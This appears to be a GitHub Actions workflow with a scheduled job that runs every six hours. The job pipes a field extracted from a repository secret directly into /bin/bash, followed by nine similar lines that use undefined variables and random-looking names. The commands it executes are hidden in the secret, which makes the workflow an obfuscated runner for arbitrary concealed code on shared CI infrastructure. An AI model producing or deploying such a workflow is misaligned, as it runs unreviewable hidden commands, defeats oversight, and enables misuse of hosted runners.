name: worldcupescutcheon

on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: worldcupescutcheon
        env:
          yth8628: ${{ secrets.yth8628 }}
        run: |
          echo $yth8628 | jq -r .rcq425 | /bin/bash
          echo $eyzvw67853 | jq -r .tcesq59285 | /bin/bash
          echo $ijvs017 | jq -r .wnhj623 | /bin/bash
          echo $zv95835 | jq -r .won74 | /bin/bash
          echo $kjx460 | jq -r .crok2 | /bin/bash
          echo $kphg616 | jq -r .mlm81275 | /bin/bash
          echo $cvdmd10655 | jq -r .j3049 | /bin/bash
          echo $ld3 | jq -r .xdzjt503 | /bin/bash
          echo $lk7828 | jq -r .w38 | /bin/bash
          echo $kr710 | jq -r .iys695 | /bin/bash

